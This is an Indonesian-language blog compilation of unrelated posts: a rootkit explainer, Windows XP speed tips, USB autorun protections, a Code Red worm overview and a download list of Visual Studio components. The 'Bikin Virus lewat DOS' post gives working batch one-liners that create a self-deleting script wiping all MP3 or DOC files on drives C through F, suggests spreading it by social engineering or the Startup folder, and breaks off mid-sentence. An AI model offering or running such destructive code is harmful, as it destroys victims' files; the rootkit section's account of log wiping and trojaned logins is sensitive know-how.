Rootkit, Tools Untuk Para Hacker

Didalam dunia hacking dikenal adanya istilah “rootkit” yang begitu populer walaupun banyak yang tidak mengerti dengan apa yang dimaksud dengan rootkit. 

Rootkit terdiri atas gabungan 2 kata, yaitu root dan kit. Root adalah hak akses tertinggi dalam system operasi keluarga unix dan kit merupakan kumpulan dari tools. Jadi rootkit bisa diartikan sebagai tools atau kumpulan tools yang digunakan untuk menguasai suatu system secara permanent tanpa diketahui oleh administrator dari mesin yang telah dikuasai.

Rootkit haruslah mempunyai kemampuan untuk menyembunyikan kehadirannya dan juga mempunyai kemampuan untuk tetap menguasai system tanpa diketahui oleh admin bersangkutan. Rootkit biasanya akan masuk kedalam arsitektur dari suatu system sehingga tidak terdeteksi, maka dari itu program backdoor seperti BO dan Netbus tidak bisa dikategorikan sebagai Rootkit.

Rootkit biasanya terdiri atas beberapa tools, seperti :

* Program Backdoor
Merupakan program yang digunakan agar system bisa tetap dikuasai dan tetap bisa di akses tanpa perlu lagi melalui exploit. Dengan begitu walaupun kelemahan system telah diperbaiki atau exploit tidak berlaku lagi, penyerang tetap mampu menguasai system melalui backdoor ini.
Program backdoor ini biasanya akan memodifikasi atau mengganti program seperti login.c, ftp, rlogin, inetd, dll sehingga memungkinkan penyerang mendapatkan hak akses melalui service yang telah termodifikasi tersebut. Penempatan backdoor bahkan dilakukan juga melalui modifikasi kernel susah untuk di deteksi kerbeadaannya.

* Packet Sniffer
Sniffer yang merupakan program yang digunakan untuk mengcapture informasi yang dilewatkan dari kabel jaringan. Program seperti ftp dan telnet biasanya dalam mengirimkan informasi username dan password dalam text yang tidak terenkripsi sehingga mudah untuk di curi.

* Pengontrol Log File
Program yang di ikut sertakan dan cukup penting dalam Rootkit adalah program untuk menghapus log. Dengan tools ini semua aktifitas dari penyerang bisa disembunyikan sehingga sang admin tidak menyadari aktifitas yang terjadi oleh pihak yang tidak diinginkan. Dengan adanya tools ini membuat sang admin akan kesulitan dalam mendeteksi keberadaan pihak yang tidak diinginkan ini. Biasanya untuk log file juga disertakan program untuk melakukan edit terhadap log file.

* Tools Lainnya
Adalah tools tambahan yang digunakan oleh penyerang seperti program Ddos client, yaitu trinoo, IRC bot yang akan melakukan koneksi secara otomatis ke pada server di IRC secara otomatis, dll.

* System Patch
Setelah mendapatkan akses kepada melalui vulnerability, rootkit juga menyediakan tools untuk melakukan patch terhadap kelemahan tersebut dengan tujuan agar hacker lain tidak akan masuk ke system tersebut. Karena penyerang telah membuat backdoor, system yang telah dikuasai tetap akan dalam kontrol sang penyerang dengan rootkit.


RootKit bisa dibedakan menjadi 2, yaitu :
* Application RootKit
* Kernel RootKit
 

• Application RootKit
Application rootkit merupakan rootkit yang banyak di pakai oleh para hacker. Rootkit ini mengganti atau merubah program yang asli dengan program yang telah dimodifikasi dengan kemampuan trojan. Beberapa contoh dari program yang diganti adalah :

* ls, find sehingga program ini tidak menampilkan program dari penyerang
* netstat yang secara normal akan menampilkan port yang di open, koneksi network, dan status listening sehingga tidak akan menampilkan program atau koneksi dari hacker.
* KillAll, sehingga program trojan yang dipasang oleh hacker tidak akan bisa di kill.
* tcpd, syslogd sehingga tidak akan mencatat aktifitas hacker dalam komputer
* passwd, dengan memasukkan password rootkit shell dari root akan bisa digunakan
* Login, semua username bisa digunakan untuk login termasuk root jika password dari rootkit digunakan
* sshd, terkadang sshd di gunakan agar tidak terdeteksi oleh sniffer.
* Linsniffer, yang digunakan untuk sniffing di network
* inet.d yang akan mengopen port sehingga hacker bisa menggunakannya untuk masuk ke target dengan password yang telah ditentukan.

• Kernel Rootkit
Kernel rootkit adalah rootkit yang lebih susah untuk dideteksi dibandingkan dengan application rootkit. Program untuk kernel rootkit ini tersedia untuk linux, Solaris dan FreeBSD.
Dengan memodifikasi kernel, hacker mampu menyembunyikan koneksi network, file, process, dll.



• Proses Pemanfaatkan Rootkit
Rootkit bukanlah alat untuk menyerang, tapi rootkit lebih ditujukan untuk sebagai alat yang digunakan setelah penyerangan. Dengan rootkit seorang hacker akan mampu tetap mengontrol komputer korban 

21 Cara Mempercepat Runing Windows XP

Komputer anda berasa lemot? Kura - kura aja pake rocket!! Hehe....

1. Untuk menurunkan waktu booting dan meningkatkan performa, tidak usah menggunakan software defrag pihak ketiga, gunakan saja perangkat Defragmenter yang buatan (built-in) Windows, tidak akan jauh beda. Dan juga, sebaiknya menggunakan Harddisk dengan tipe Ultra-133 atau Serial ATA (SATA) dengan buffer 8-MB

2. Jika RAM PC kurang dari 512 MB, maka sebaiknya ditambah kapasitas memorinya.. Hal ini relatif tidak mahal dan akan membantu meningkatkan performa sistem Anda secara dramatis.

3.Pastikan file system yang digunakan Windows XP adalah NTFS.

Cara memeriksanya:

• . Buka Windows Explorer (My Computer)
• . Klik kanan pada drive C:
• . Klik Properties.

Kalau ternyata file system Anda menggunakan FAT32, maka untuk mengubahnya
adalah dengan cara sebagai berikut:

• - Backup data-data penting dulu ya.
• - Klik Start > Run > ketik CMD
• - Setelah muncul jendela Command Prompt, ketik:

Code:
CONVERT C: /FS:NTFS
Catatan: Komputer jangan disela ketika melakukan konversi ini, dan juga dalam keadaan bebas dari virus. File system yang digunakan oleh drive bootable (biasanya C: ) bisa FAT32 atau NTFS. Saya sangat merekomendasikan untuk menggunakan NTFS demi keamanan superior, ketahanan dan efisiensi ruang yang lebih besar.


4. Non aktifkan File Indexing.
Layanan File Indexing mengekstraksi informasi dari dokumen-dokumen dan file-file lainnya yang ada pada harddisk dan membuat sebuah "searchable keyword index" (index keyword pencarian). Bisa dibayangkan proses ini sangat memberatkan sistem.

Cara kerjanya sbb:

Seorang user mencari kata, frase, atau properti sebuah dokumen, dari dokumen-dokumen yang jumlahnya ratusan atau ribuan dan ia tidak tahu nama dari dokumen yang dicari. Windows XP dengan fungsi built-in search masih bisa melakukan berbagai macam jenis pencarian tanpa melibatkan Indexing Service. Tapi agak lebih lama. Sistem Operasi harus membuka tiap file ketika diminta tolong mencari apa yang user inginkan.
Kebanyakan orang tidak membutuhkan fitur pencarian ini. Yang biasanya membutuhkan adalah lingkungan perusahaan yang besar dimana ribuan dokumen diletakkan pada paling tidak satu server. Akan tetapi jika hanya semacam system builder, yang kebanyakan kliennya adalah bisnis kecil dan menengah, dan jika para klien tidak membutuhkan fitur tersebut, saya rekomendasikan supaya mendisfungsikannnya (disable) layanan tersebut.

Caranya Mendisfungsikannya:

a. Buka Windows Explorer (My Computer)
b. Klik kanan pada drive C:
c. Pilih Properties
d. Hilangkan tanda centang (checklist) "Allow Indexing Service to index this disk for
fast file searching."
e. Klik tombol Apply, muncul: apply changes to "C: subfolders and files"
f. Klik tombol OK.

Jika ada pesan peringatan atau error muncul (seperti "Access is denied"), klik tombol Ignore All.


5. Update driver VGA dan chipset motherboard, termasuk update BIOS dan konfigurasinya. Carilah info-info tentang konfigurasi BIOS secara tepat di internet.


6. Kosongkan folder Prefetch windows setiap 3 bulan atau lebih.
Windows XP merekam sebagian dari data atau aplikasi yang sering digunakan agar membuat proses load kelihatan lebih cepat ketika dipanggil oleh user. Hal ini bagus, tetapi untuk waktu yang lama, folder prefetch bisa jadi kelebihan muatan referensi file dan aplikasi yang tidak lagi digunakan. Jika hal itu terjadi, Windows XP akan membuang-buang waktu dan memperlambat performa sistem, ketika melakukan load aplikasi atau file. Tidak ada yang penting dalam folder tersebut, dan seluruh isinya aman untuk dihapus.

Folder tersebut terletak di: C:¥WINDOWS¥Prefetch¥


7. Sekali sebulan jalankan disk cleanup.
Caranya:
a. Buka Windows Explorer (My Computer)
b. Klik kanan pada drive C:
c. Pilih Properties
d. Klik tombol Disk Cleanup dan delete semua file temporer.


8. Pada Device Manager, klik ganda pada IDE ATA/ATAPI Controllers device, dan pastikan DMA di-enable (diaktifkan) untuk tiap drive yang terhubung ke Primary Controller dan atau Secondary controller.
Lakukan hal ini dengan cara:
a. Klik ganda pada Primary IDE Channel. kemudian klik tab Advance Settings.
b. Pastikan Transfer Mode -nya diset pada "DMA if Available" untuk kedua Device 0
dan Device 1.
c. Lakukan hal serupa pada Secondary IDE Channel.


9. Upgrade Pengkabelan.
Untuk peningkatan teknologi harddisk, dibutuhkan pengakabelan yang akan mendorong performa lebih baik. Pastikan untuk menggunakan kabel 80-wire Ultra-133 untuk semua device IDE dan gunakan konektor yang cocok dengan socket Master/Slave/Motherboard. Kalo Device-nya cuma satu, harus dihubungkan pada konektor yang paling ujung dari kabel pita (kabel data), jangan pada konektor yang di tengah kabel pita, jika tidak, maka akan terjadi masalah sinyal. Pada harddisk ultra DMA, masalah sinyal ini bisa mencegah harddisk memaksimalkan potensinya.


10. Buang semua spyware dari komputer.
Gunakan program gratisan seperti AdAware buatan Lavasoft atau SpyBot Search & Destroy. Setelah program ini terinstal, pastikan untuk melakukan cek update dan mendownloadnya jika ada, sebelum melakukan pencarian spyware di komputer. Apapun program yang ditemukan bisa dihapus secara aman. Semua program gratisan yang meminta spyware untuk dijalankan tidak akan berfungsi lagi. Jika program-program gratisan itu masih dibutuhkan tinggal instal lagi saja.


11. Buang semua program atau item yang tidak perlu dari rutin (routin) Windows Startup dengan menggunakan utilitas MSCONFIG.

Caranya:
a. Klik Start > Run > ketik MSCONFIG > klik OK
b. Klik tab StartUp ?> kemudian hilangkan checklist (tanda centang) dari program yang tidak diinginkan.

Tidak paham dengan item-item tersebut? Kunjungi WinTasks Process Library. Situs itu memuat proses sistem, aplikasi yang diketahui dan juga tentang referensi spyware dan penjelsannya. Atau bisa diidentifikasi nama item-item tersebut secara langsung dengan menggunakan google.


12. Buang semua program yang tidak digunakan dari Add/Remove Programs di Control Panel.


13. Matikan beberapa atau semua animasi yang tidak dibutuhkan dan nonaktifkan (disable) active desktop.
Pada kenyataannya, untuk optimasi performa, matikan semua animasi. Windows Xp menawarkan banyak setting-setting yang berbeda pada bagian ini.

Caranya:
a. Klik System Icon di Control Panel
b. Klik tab Advance
c. Klik tombol Settings pada kotak Performance.
d. Hilangkan checklist (tanda centang) opsi apa saja yang tidak ingin dijalankan.

Atau bisa langsung klik pada Radio Button: Adjust for best performance.


14. Kalo bisa mengedit Registry Windows XP, lakukan untuk meningkatkan performa XP.
Bisa menggunakan software tweak atau manual mengedit registry. Di internet sudah banyak tersebar.


15. Kunjungi situs Microsoft
Update Microsoft Windows secara rutin dan download semua update yang berlabel Critical. Download juga Optional update yang dibutuhkan. (ingat, kalau software OS windows XP -nya bajakan, jangan coba-coba untuk mengupdate, bisa dikasih "stempel" tanda bajakan sama Microsoft yang justru akan memperlambat sistem ketika booting dan running).


16. Update anti virus
Update dalam sepekan sekali atau bahkan harian. Pastikan hanya satu software yang terinstal. Menggabungkan lebih dari satu antivirus hanya akan mengundang penyakit bagi performa dan kahandalan komputer.


17. Jangan Menginstal Banyak Font
Pastikan font yang terinstal kurang dari 500 jenis saja pada komputer. Makin banyak font, makin lambatlah sistem. Walaupun windows XP lebih efisien dalam menangani font dari pada versi sebelumnya, tapi kelebihan font akan berdampak pada melemahnya sistem.


18. Jangan partisi harddisk.
(Opsional saja) NTFS File System Windows XP berjalan lebih efisien pada satu partisi yang besar. Data tidak lebih aman pada partisi terpisah, dan format ulang tidak dibutuhkan untuk instal ulang Sistem Operasi (OS). Satu partisi ini berfungsi agar tidak ada pembatasan oleh partisi akan tetapi akan dibatasi oleh ukuran kapasitas harddisk itu sendiri. Sehingga tidak perlu melakukan resize partisi yang meghabiskan waktu dan resiko kehilangan data.


19. Lakukan pengecekan terhadap sistem RAM untuk memastikan beroperasi dengan baik.
Saya merekomendasikan untuk menggunakan program gratisan MemTest86. Setelah didownload, bisa membuat bootable CD atau disket (sesuai pilihan) yang akan melakukan 10 macam tes pada memory PC secara otomatis setelah malakukan boot dengan CD atau disket yang dibuat. Biarkan semua tes berjalan sampai paling tidak melewati 3 tes selesai dari 10 tes. Jika program mendapati error, matikan dan cabut listrik komputer, cabut RAM memory, ganti dengan yang lain dan lakukan tes lagi. Ingat, memory yang rusak tidak bisa diperbaiki, dan hanya bisa diganti.

20. Jika terdapat CD atau DVD recorder / writer, carilah update firmware dari pabriknya.
Pada beberapa kasus, upgrade terbukti bisa mempercepat recorder tersebut dan biasanya gratis.


21. Non aktifkan (disable) service (layanan) yang tidak penting.
Windows XP memasang banyak service yang tidak dibutuhkan. Untuk menentukan service apa saja yang tidak dibutuhkan, buka situs Black Viper untuk konfigurasi Windows XP.

Bikin Virus lewat DOS

Sebenarnya saya tidak bergitu tertarik membahas tema yang satu ini. Karena cenderung bersifat merusak. Jadinya, saya tidak akan berpanjang lebar dalam bab ini. Ada banyak cara untuk membuat virus, salah satunya dalam Blog ini adalah dengan DOS. Saya hanya akan memberikan sebuah contoh sangat sederhana dalam pembuatan virus. Efeknya akan menghapus file MP3 yang ada dalam komputer. Sebenarnya saya pernah melihat sebuah virus penghapus MP3 yang dibuat menggunakan Visual Basic, tapi kalau cuma mau menghapus sebuah file, rasanya tidak perlu menggunakan banyak-banyak source code. Bahkan dalam buku ini Anda bisa membuat virus sejenis hanya dengan satu baris perintah pada DOS. Tidak cuma itu, Anda juga bisa mengkreasikannya untuk melakukan aksi delete jenis file lainnya, cuma dengan menggantikan ekstensi file. Anda juga bisa memodifikasi untuk menghapus semua file MP3 dalam seluruh drive atau hanya dalam folder tertentu.

Yang perlu Anda ketikkan dalam DOS adalah:

echo for %%p in (C:\hack) do del *.mp3 %0 %%p:>virusdot.bat

Gambar Virusdos.bat

Maka akan muncul seekor virus yang bernama virus.dot dalam folder yang aktif.

Gambar File target

Untuk menjalankannya, saya serahkan kepada Anda. Apakah mau menggunakan Social Engineering, dipasang di StartUp. Semua itu urusan Anda. Saya hanya mengajari cara membuatnya saja. Sebagai contoh, saya langsung mengaktifkan file virus virusdos.bat tersebut. Perhatikan, sekarang virus itu telah bekerja dengan menghapus semua file MP3 yang ada di dalamnya. Termasuk virus itu sendiri menghilangkan dirinya, untuk menghapus jejak.

Gambar File Target Dihapus

Maaf ya, saya cuma memberikan satu itu saja. Untuk model model lainnya, pelajari sendiri. Khan saya sudah bilang tidak begitu tertarik dengan bab ini. Sebagai sedikit bonus, apabila Anda berniat memodifikasi supaya

virus tersebut dapat menghapus dalam semua drive, bentuk syntax-nya adalah:

 echo for %%p in (C D E F) do del *.mp3 %0 %%p:>virusdot.bat

Nanti, virus akan menyusup ke drive C, D, E, dan F untuk menghapus file MP3. Sekarang apabila berniat jenis file tertentu, katakanlah file dokumen (DOC), syntax-nya menjadi:

echo for %%p in (C D E F) do del *.doc %0 %%p:>virusdot.bat

Yah, pokoknya pintar-pintar Anda-lah. Saya agak

Mencegah virus menular melalui Flashdisk

Dengan penggunaan flashdisk yang sudah umum dimana-mana, menjadi salah satu sebab menjamurnya virus, terutama virus lokal. Ini terlihat sejak masa jayanya virus brontok. Sampai saat ini, saya sering sekali melihat hampir setiap komputer/laptop teman-teman di perkantoran terkena virus, yang terkadang mereka tidak menyadari. Selain Antivirus yang seharusnya senantiasa diupdate minimal seminggu sekali, sebenarnya ada tips yang sangat bermanfaat untuk mencegah menularnya virus dari media seperti flashdisk tanpa kita sadari. Berikut langkah-langkahnya :

1.Buka Registry Editor, dengan cara klik Start Menu > Run dan ketik regedit dan klik OK

2. Cari Lokasi :

      KEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

3. Buat key baru ( Klik kanan > New > DWORD Value ) beri nama : NoDriveAutoRun

4.Double klik untuk mengisi nilai ( data ). Pilih Base : Decimal dan isikan Value data dengan nilai 67108863

5.Jika diperlukan, dapat juga menambahkan nilai yang sama di

  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer

6. Restart Komputer

Dengan penambahan setting ini, maka ketika kita memasang flashdisk, windows tidak akan otomatis menjalankan program autorun yang ada di flashdisk. Untuk lebih jelasnya, artikel ini dapat dicari/dibaca di tutorial Windows Registry Guides. Download.

Membuat flashdisk aman dari autorun-nya si-virus

Tentunya teman2 semuanya sudah mengetahui bhw virus2 dapat menularkan dirinya ke komputer2 lain dengan media flashdisk. -.-“. Kesal? Sudah pasti! Saya juga merasakan perasaan yang sama ketika komputer saya juga ikut2an kena virus… tapi saya punya cara yang ampuh agar virus yang ada di flashdisk tersebut tidak dapat menularkan dirinya ke komputer lain..

Baiklah saya akan mulai membahasnya sekarang, diawali dengan cara penularan virus lewat media flashdisk. Sebenarnya sangat simple, ketika flashdisk dicolokan kedalam port usb virus yang sedang berjalan tinggal men-copy dirinya sendiri ke dalam flashdisk, dan tidak lupa pula dengan membuat file “autorun.inf” yang letak file-nya kasat mata sehingga tidak dapat dilihat. nah… file inilah yang akan kita edit agar virusnya tidak dapat menjalankan dirinya di komputer kita.

Cara yang pertama dengan mengedit secara manual dengan menggunakan notepad atau wordpad. Diasumsikan flashdisk kita yang telah dicolokan kedalam komputer (yang telah terinfeksi) beralamat “F:\”, maka saya akan mencoba membuka file “F:\autorun.inf” lalu enter. Lalu notepad akan terbuka secara otomatis dengan beberapa mantra didalamnya, setelah itu kita tinggal mengedit mantra tersebut dengan memblock semua mantra tersebut(ctrl+a) lalu hapus(backspace atau del) lalu anda bisa membiarkannya kosong lalu tekan ctrl+s untuk men-savenya. Anda juga bisa menuliskan beberapa puisi indah tentang perdamaian didalamnya ^-^.

Tetapi bang blckflcn, bagaimana jika file tersebut memiliki attribute “read-only”? yang jelas kita tidak dapat mengeditnya secara manual!(aaaaarrrrrgh!!!!). Lalu? Apa yang dapat kita lakukan… bang blckflcn? Gigi dibalas dengan gigi, mata dibalas dengan mata, dan yah… anda benar! MANTRA juga DIBALAS DENGAN MANTRA!! Mantranya sangatlah mudah… saya akan membahasnya secara bertahap sekarang juga :

1. buka aplikasi notepad (tempat dimana kita akan menulis mantra)
2. tuliskan mantra “del /a:r f:\autorun.inf” (tnp tanda petik) lalu enter.
3. langkah selajutnya adalah tulis mantra lagi! Mantranya “echo ‘terserah tulisan apa’ >f:\autorun.inf&attrib +r f:\autorun.inf” (tnp tanda petik juga).
4. lalu save file mantra tersebut dengan nama file terserah anda dan path-nya terserah anda juga, tetapi extension-nya harus “.bat”(harus tidak boleh tidak)
5. lalu jalankan file mantra yang baru kita buat tersebut
6. buka explorer
7. pada bagian address tuliskan “F:\autorun.inf”, lalu tekan enter sambil mengucapkan “sim…salabim…”. Maka aplikasi notepad akan muncul lagi sambil menampilkan beberapa tulisan, tetapi yang ini jelas bukan mantra ^-^.

 Setelah beberapa step tadi, virus tidak dapat menjalankan dirinya di komputer lain ketika kita mencolokan flashdisk kita kedalam port usb-nya. Tetapi bang blckflcn, virus2 dari komputer yang terinfeksi tersebut masih ada di dalam flashdisk saya. Bagaimana ini? Yah, itu sih bukan tugas saya lagi. Itu sih sudah menjadi tugas anti-virus… saya hanya memberitahukan cara agar virusnya tidak berjalan ketika flashdisk kita dicolokan kedalam port usb pada komputer yang lain… lagian mantra yang saya punya masih belum begitu ampuh untuk membuat virus tidak berjalan di komputer. Oleh karena itu, saya akan belajar tentang mantra2 tersebut di hogwarts agar lebih ampuh. Hehehe… ^-^.
 Okeh… sekian saja info2 dan mantra2 yang saya jabarkan. (krn sdh tidak tahu lagi harus menjabarkan mantra yang mana ^-^)

Serangan Virus Code Red Worm di Internet

Pertanyaannya adalah – seberapa jauh effek serangan ini kepada Internet di Indonesia? Jawaban singkatnya adalah – karena sebagian besar sekali komunitas Internet di Indonesia hanyalah pengguna Internet biasa; maka serangan virus code red praktis tidak terlalu terasa di Indonesia.

Apakah itu virus code red worm? Code red worm termasuk serangan yang mengeksploitasi buffer overrun di software Web server. Penyerang yang berhasil mengeksplotasi kelemahan Web server ini akan bisa mengambil alih kontrol Web server yang di serangnya. Dengan cara ini, seorang penyerang dapat melakukan banyak hal, seperti mengganti halaman Web, memformat harddisk, menambahkan user baru ke group administrator lokal. Serangan ini hanya bisa terjadi jika ada komponen tertentu yang lemah yang ada di Server tersebut.

Dalam kasus code red worm, komponen tersebut adalah index servis. Lebih jelasnya virus code red worm kebetulan menyerang Web server yang di jalankan di Windows NT 4.0 atau Windows 2000; lebih spesifik-nya yang di serang oleh virus ini adalah Microsoft Index Server 2.0, Indexing Service di Windows 2000 & Windows XP beta yang merupakan bagian dari perangkat Microsoft IIS 4.0 & 5.0. Index Server 2.0 & Indexing Service adalah mesin pencari & pengindex full-text untuk digunakan dengan Windows NT 4.0 dan Windows 2000. Mesin pencari ini memungkinkan pengguna dengan Web browser mencari dokumen dengan cara memasukan keyword, kata-kata atau properti dokumen.

Spesifik program yang bermasalah / di serang adalah idq.dll yang merupakan bagian dari ISAPI (Internet Services Application Programming Interface) yang merupakan teknologi yang memungkinkan develoer Web mengembangkan fungsi dari IIS server. Kesalahan yang terjadi di idq.dll adalah adanya buffer yang tidak di check pada program yang menangani permintaan yang masuk. Akibatnya, jika ada permintaan yang tidak baik masuk, masalah buffer overrun akan terjadi, dengan dua (2) hasil utama:

• Jika permohonan ke idq.dll hanya berisi ramdom data, hal ini hanya akan menyebabkan server gagal bekerja saja. Jika IIS 4.0 digunakan, administrator cukup me-restart sistem saja. Jika IIS 5.0 digunakan maka Web server akan merestart diri sendiri.
• Jika permohonan idq.dll berisi perintah khusus yang dapat dijalankan di server. Si penyerang dapat menjalankan program dengan kekuasaan sebagai sistem administrator. Hal ini memungkinkan penyerang halaman web, konfigurasi ulang server dan menjalankan perintah sistem operasi lainnya.

Kelemahan ini dapat di eksploitasi jika sebuah hubungan komunikasi Web terjadi dengan server yang di serang. Bagi Server yang menggunakan Index Server / Index Servis yang bukan dari IIS tidak mempunyai masalah dengan red code worm. Contohnya pengguna Windows 2000 Profesional. Serangan juga tidak bisa terjadi jika script mapping untuk Internet Data Administration (.ida) dan Internet Data Query (.idq) tidak ada. Prosedur untuk menghilangkan mapping ini di jelaskan di IIS 4.0 & IIS 5.0 security checklist. Kebetulan mapping ini dapat dihilangkan secara automatis melalui High Security Template (IIS) atau Windows 2000 Internet Server Security Tool.

Patch (perbaikan) agar Index Servis tidak lagi menderita serangan dari code red worm dapat di ambil untuk Windows NT 4.0 di http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833 sedangkan untuk Windows 2000 Professional, Server & Advanced Server di http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800.

Sedangkan verifikasi instalasi perbaikan dapat dilihat dengan mudah melalui editor registry Windows, pada Windows NT 4.0 kunci registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Hotfix\Q300972. Sedang untuk Windows2000 dapat dilihat adanya registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows2000\SP3\Q300972. Untuk memverifikasi masing-masing file, gunakan tanggal/waktu dan informasi versi yang diberikan pada kunci registry berikut HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows2000\SP3\Q300972\Filelist.

Componet Visual basic di VS2010

Beberapa Componet dapat di tambahkan pada VS2010 terutama  penambahan Tool untuk Pemograman VB,C#,WPF,Dan ASP.net diantaranya ada di bawah ini :


1. Devexpress Vol 2

     Download

2. Componetone

download

3. .Infragistics netadvantage

Download

4. Telirik

Download